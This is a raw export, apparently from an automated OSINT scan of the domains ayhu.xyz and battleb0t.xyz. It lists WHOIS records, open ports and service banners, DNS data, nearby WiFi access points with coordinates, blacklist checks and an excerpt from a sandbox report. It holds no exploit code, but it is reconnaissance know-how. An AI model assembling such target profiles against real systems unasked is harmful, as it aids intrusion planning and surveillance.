u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "Cab572A.tmp" has type "Microsoft Cabinet archive data 62397 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 62397 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00003348]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003488]\n "search_2_.json" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "J81AH7HB.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\J81AH7HB.txt]- [targetUID: 00000000-00003348]\n "_A642BCC0-43D5-11ED-9763-08002704A352_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF1789E30B0526E037.TMP" has type "data"- Location: [%TEMP%\\~DF1789E30B0526E037.TMP]- [targetUID: 00000000-00003348]\n "Tar572B.tmp" has type "data"- Location: [%TEMP%\\Tar572B.tmp]- [targetUID: 00000000-00003488]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00003348]\n "NewErrorPageTemplate_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003348]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00003488]\n "_9B397A29-43D5-11ED-9763-08002704A352_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_DBECEA34-43D6-11ED-9763-08002704A352_.dat" has type "Composite Document File V2 Document Cannot read short stream"- [targetUID: N/A]\n "92D7422C4B07CA9C9F3C147A693D9EF5" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\92D7422C4B07CA9C9F3C147A693D9EF5]- [targetUID: 00000000-00003488]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "Cab572A.tmp" has type "Microsoft Cabinet archive data 62397 bytes 1 file"- Location: [%TEMP%\\Cab572A.tmp]- [targetUID: 00000000-00003488]\n "~DFAA5D95001843E9B0.TMP" has type "data"- Location: [%TEMP%\\~DFAA5D95001843E9B0.TMP]- [targetUID: 00000000-00003348]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://injectitlimited.cmail19.com/t/i-c-tiirkhydn"\n Pattern match: "http://injectitlimited.cmail19.com"\n Heuristic match: "injectitlimited.cmail19.com"\n Heuristic match: "x1.c.lencr.org"\n Heuristic match: "GET / HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: x1.c.lencr.org"\n Pattern match: "www.fsi-language-courses.org"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /course-download-email-confirmation/ HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: www.fsi-language-courses.org"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/89 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'Unusual Characteristics', u'origin': u'Network Traffic', u'identifier': u'network-18', u'name': u'Contacts Mail Related Domain Names', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/003', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1071.003', u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'"injectitlimited.cmail19.com" is probably a mail server'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-22', u'name': u'Uses a User A | 35.229.48.116 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 1 | 3 | 0 | None | Netlify | {"content-length": "1200", "content-encoding": "gzip", "accept-ranges": "bytes", "strict-transport-security": "max-age=31536000", "vary": "Accept-Encoding", "server": "Netlify", "etag": "\"10b11d9bef9ac1c17b1885f92638df3c-ssl-df\"", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:18 GMT", "x-nf-request-id": "01H06Y2WDQHNHJAAXWWVJBZZ5B", "content-type": "text/html; charset=UTF-8", "age": "0"} |
| 2023-05-12 02:54:13 | Open TCP Port | No | Censys | 0 | 0 | 4 | 0 | None | 2606:4700:3030::ac43:a8fc:80 | 2606:4700:3030::ac43:a8fc |
| 2023-05-12 02:59:47 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 2 | 0 | None | abuse@godaddy.com | Domain Name: AYHU.XYZ
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com/
Updated Date: 2023-01-27T12:12:18.0Z
Creation Date: 2022-12-13T18:01:25.0Z
Registry Expiry Date: 2023-12-13T23:59:59.0Z
Registrar: Go Daddy, LLC
Registrar IANA ID: 146
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4805058800
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:06.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ayhu.xyz
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-12-13T18:01:26Z
Creation Date: 2022-12-13T18:01:25Z
Registrar Registration Expiration Date: 2023-12-13T23:59:59Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR599348184
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Admin ID: CR599348186
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Tech ID: CR599348185
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:44:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | FruityWifi-001
(Net ID: 00:02:72:8E:62:D1) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:01:20 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.180): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | default (Net ID: 00:01:24:F0:43:45) | 37.7642, -122.3993 |
| 2023-05-12 03:01:16 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.141): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:32:33 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.17:8080 | 188.114.97.0/24 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:04:5A:DB:DA:99) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | no_ssid (Net ID: 00:00:AA:94:7C:2C) | 41.8781, -87.6298 |
| 2023-05-12 02:55:15 | Open TCP Port Banner | No | Censys | 0 | 1 | 3 | 0 | None | SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1 | 165.232.113.85 |
| 2023-05-12 03:10:04 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | acilacikveteriner.com | acilacikveteriner.com |
| 2023-05-12 02:46:43 | Physical Location | No | MetaDefender | 0 | 0 | 3 | 0 | None | North Charleston, United States | 34.74.170.74 |
| 2023-05-12 02:45:07 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 1 | 0 | None | {u'count': 1, u'search_terms': [{u'id': u'domain', u'value': u'battleb0t.xyz'}], u'result': [{u'environment_id': 160, u'job_id': u'6421d18abc9d17a8490ac78d', u'analysis_start_time': u'2023-03-27 17:25:30', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no verdict', u'submit_name': u'sample.url', u'sha256': u'4feea01ff4a783ce1c5865f5114d6f2620c834d630588769904d9a0871e30a8d', u'type': None, u'type_short': u'url', u'size': 53}]} | battleb0t.xyz |
| 2023-05-12 02:46:54 | Affiliate - Domain Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | cloudflare.com | daphne.ns.cloudflare.com |
| 2023-05-12 02:44:23 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.com | 185.199.108.153 |
| 2023-05-12 03:24:29 | Affiliate - Company Name | No | Company Name Extractor | 0 | 0 | 4 | 0 | None | Cloudflare, Inc. | Domain Name: CLOUDFLARE.NET
Registry Domain ID: 1542998918_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: http://www.cloudflare.com
Updated Date: 2015-10-20T06:46:53Z
Creation Date: 2009-02-17T22:08:05Z
Registry Expiry Date: 2024-02-17T22:08:05Z
Registrar: CloudFlare, Inc.
Registrar IANA ID: 1910
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
Name Server: NS1.CLOUDFLARE.NET
Name Server: NS2.CLOUDFLARE.NET
Name Server: NS3.CLOUDFLARE.NET
Name Server: NS4.CLOUDFLARE.NET
Name Server: NS5.CLOUDFLARE.NET
DNSSEC: signedDelegation
DNSSEC DS Data: 2371 13 2 90F710A107DA51ED78125D30A68704CF3C0308AFD01BFCD7057D4BD03B62C68B
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: CLOUDFLARE.NET
Registry Domain ID: 1542998918_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: https://www.cloudflare.com
Updated Date: 2022-03-16T19:39:08Z
Creation Date: 2009-02-17T22:08:05Z
Registrar Registration Expiration Date: 2024-02-17T22:08:05Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clientdeleteprohibited https://icann.org/epp#clientdeleteprohibited
Domain Status: clienttransferprohibited https://icann.org/epp#clienttransferprohibited
Domain Status: serverdeleteprohibited https://icann.org/epp#serverdeleteprohibited
Domain Status: servertransferprohibited https://icann.org/epp#servertransferprohibited
Domain Status: serverupdateprohibited https://icann.org/epp#serverupdateprohibited
Domain Status: clientupdateprohibited https://icann.org/epp#clientupdateprohibited
Registry Registrant ID:
Registrant Name: DATA REDACTED
Registrant Organization: DATA REDACTED
Registrant Street: DATA REDACTED
Registrant City: DATA REDACTED
Registrant State/Province: CA
Registrant Postal Code: DATA REDACTED
Registrant Country: US
Registrant Phone: DATA REDACTED
Registrant Phone Ext: DATA REDACTED
Registrant Fax: DATA REDACTED
Registrant Fax Ext: DATA REDACTED
Registrant Email: https://domaincontact.cloudflareregistrar.com/cloudflare.net
Registry Admin ID:
Admin Name: DATA REDACTED
Admin Organization: DATA REDACTED
Admin Street: DATA REDACTED
Admin City: DATA REDACTED
Admin State/Province: DATA REDACTED
Admin Postal Code: DATA REDACTED
Admin Country: DATA REDACTED
Admin Phone: DATA REDACTED
Admin Phone Ext: DATA REDACTED
Admin Fax: DATA REDACTED
Admin Fax Ext: DATA REDACTED
Admin Email: https://domaincontact.cloudflareregistrar.com/cloudflare.net
Registry Tech ID:
Tech Name: DATA REDACTED
Tech Organization: DATA REDACTED
Tech Street: DATA REDACTED
Tech City: DATA REDACTED
Tech State/Province: DATA REDACTED
Tech Postal Code: DATA REDACTED
Tech Country: DATA REDACTED
Tech Phone: DATA REDACTED
Tech Phone Ext: DATA REDACTED
Tech Fax: DATA REDACTED
Tech Fax Ext: DATA REDACTED
Tech Email: https://domaincontact.cloudflareregistrar.com/cloudflare.net
Registry Billing ID:
Billing Name: DATA REDACTED
Billing Organization: DATA REDACTED
Billing Street: DATA REDACTED
Billing City: DATA REDACTED
Billing State/Province: DATA REDACTED
Billing Postal Code: DATA REDACTED
Billing Country: DATA REDACTED
Billing Phone: DATA REDACTED
Billing Phone Ext: DATA REDACTED
Billing Fax: DATA REDACTED
Billing Fax Ext: DATA REDACTED
Billing Email: https://domaincontact.cloudflareregistrar.com/cloudflare.net
Name Server: ns1.cloudflare.net
Name Server: ns2.cloudflare.net
Name Server: ns3.cloudflare.net
Name Server: ns4.cloudflare.net
Name Server: ns5.cloudflare.net
DNSSEC: signedDelegation
Registrar Abuse Contact Email: registrar-abuse@cloudflare.com
Registrar Abuse Contact Phone: +1.4153197517
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:59:47Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Cloudflare provides more than 13 million domains with the tools to give their global users a faster, more secure, and more reliable internet experience.
NOTICE:
Data in the Cloudflare Registrar WHOIS database is provided to you by Cloudflare
under the terms and conditions at https://www.cloudflare.com/domain-registration-agreement/
By submitting this query, you agree to abide by these terms.
Register your domain name at https://www.cloudflare.com/registrar/
|
| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 401 Unauthorized
Date: <REDACTED>
Server: cPanel
Persistent-Auth: false
Host: 87.248.157.102:2079
Cache-Control: no-cache, no-store, must-revalidate, private
Connection: close
Vary: Accept-Encoding
WWW-Authenticate: Basic realm="Horde DAV Server"
Content-Encoding: gzip
Content-Length: 52
Content-Type: text/html; charset="utf-8"
Expires: Fri, 01 Jan 1990 00:00:00 GMT
| 87.248.157.102 |
| 2023-05-12 02:54:18 | HTTP Headers | No | Web Spider | 2 | 0 | 4 | 0 | None | {"content-length": "243", "accept-ranges": "bytes", "strict-transport-security": "max-age=31536000", "server": "Netlify", "etag": "\"c575cbc28e14cae03836d1d0fc69c052-ssl\"", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:18 GMT", "x-nf-request-id": "01H06Y2WPKRCCC7SJ49ZB68B31", "content-type": "text/css; charset=UTF-8", "age": "0"} | https://pics.battleb0t.xyz/gallery.css |
| 2023-05-12 03:01:35 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.119): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:13 | Linked URL - Internal | No | Web Spider | 4 | 0 | 2 | 0 | None | https://ayhu.xyz/cdn-cgi/styles/challenges.css | https://ayhu.xyz/ |
| 2023-05-12 02:54:00 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c56db576d8c1409-ORD
Content-Encoding: gzip
| 104.21.6.166 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | ADSL-WiFi_Telfort (Net ID: 00:13:49:CF:0D:6D) | 50.8897, 6.0563 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | conam (Net ID: 00:06:25:D8:C9:41) | 39.0469, -77.4903 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SFUSA (Net ID: 00:01:24:F1:6D:E3) | 37.7642, -122.3993 |
| 2023-05-12 03:09:38 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 229.30.196.104.bc.googleusercontent.com | 104.196.30.229 |
| 2023-05-12 03:03:20 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0-experiments.github.io |
| 2023-05-12 02:53:17 | IP Address | No | Mnemonic PassiveDNS | 0 | 0 | 1 | 0 | None | 104.21.6.166 | ayhu.xyz |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Riaan (Net ID: 00:01:36:08:E7:41) | 52.3759, 4.8975 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Merken (Net ID: 00:14:5C:86:BE:BA) | 50.8897, 6.0563 |
| 2023-05-12 02:44:43 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | vscode.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:81:34:2e:fd:61:48:b5:6f:11:ca:36:0b:dc:62:9a:cf:52
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 09:44:02 2022 GMT
Not After : Feb 15 09:44:01 2023 GMT
Subject: CN=vscode.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:eb:b0:96:39:35:d3:30:8a:f5:f9:da:c5:cf:96:
1a:e7:f9:f3:a9:a3:ac:48:a3:a4:b9:37:4c:63:75:
40:36:2d:7f:85:6e:28:b7:ff:1d:a9:b7:7a:9e:a9:
3c:18:2e:aa:60:9b:01:a6:03:71:f5:37:c6:c4:08:
7f:2e:0c:29:9a:02:88:31:a0:12:65:5e:31:21:f1:
5f:d6:97:6e:ea:18:9d:90:ce:ff:12:3b:cb:ae:3a:
f3:b3:33:e6:51:66:ee:77:b1:1e:2d:63:9d:86:29:
e8:e7:da:f5:95:bf:4c:37:58:2b:4b:3b:b3:82:8c:
63:1f:3a:3d:4d:85:c4:0d:2f:dd:0c:39:76:ab:a5:
7c:fc:53:9d:e0:67:9e:f7:6e:00:5d:8f:60:c1:b4:
dd:6b:fb:d3:a5:23:a0:c0:99:85:04:91:d1:e3:63:
1f:33:3f:20:df:22:22:a9:89:b5:26:f8:3b:cf:ec:
a6:2f:0a:b5:ce:e9:fd:d6:cf:3c:d3:6e:35:3e:a2:
cb:0a:4c:43:1f:c2:91:d1:57:92:fc:79:bc:b6:50:
67:72:7f:f2:de:ba:e6:81:c8:81:ad:91:41:c2:41:
68:e4:66:e4:cf:77:e7:8f:ad:4a:dd:cf:21:57:7e:
5c:5b:1a:bf:18:03:99:5a:e7:0b:bf:13:4e:4f:9d:
f8:63:3c:53:43:ba:5c:2b:86:aa:b1:6c:59:33:66:
06:b4:0c:58:5e:eb:57:fb:21:90:64:8e:04:88:5e:
93:71:bc:07:a7:76:0a:39:5b:e9:8a:11:59:0c:e9:
3d:9f:ef:48:1a:15:f1:b6:8d:38:c6:ac:b0:3d:55:
62:fd:ec:ca:10:f7:3e:ad:09:2b:f9:07:39:64:89:
c0:8c:df:58:83:b1:49:a3:6a:de:8d:1d:b0:68:22:
42:05:11:89:f5:28:3d:e2:a8:01:12:cb:7f:55:12:
36:97:26:ba:dd:f2:81:bc:89:38:da:02:ae:fd:90:
99:5d:a3:f5:46:95:ac:11:67:63:06:d1:ab:ad:cc:
15:5b:ae:15:c5:be:e2:e1:4a:b9:58:65:89:ff:47:
b7:6c:bd:4d:78:de:bc:99:4b:30:66:94:63:8c:10:
f1:ba:46:36:e6:f8:37:e7:a4:4a:58:f8:29:e5:40:
29:33:93:f8:de:48:92:4e:5d:bb:50:eb:49:71:90:
ef:b5:9b:2c:bf:b0:19:fb:12:45:a7:b3:2e:45:b4:
1b:cf:46:ab:19:7f:6c:7d:d1:f9:c0:87:cb:fb:3f:
0d:76:c4:c2:98:11:bd:11:fc:93:89:ac:ab:3e:87:
64:67:c1:b8:49:1c:b8:1a:ca:85:02:c8:58:c0:9e:
e2:87:d7
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
A7:55:24:63:5E:86:20:7B:DE:F3:EF:D8:48:33:0B:C7:5C:3F:22:72
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:vscode.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Nov 17 10:44:02.310 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
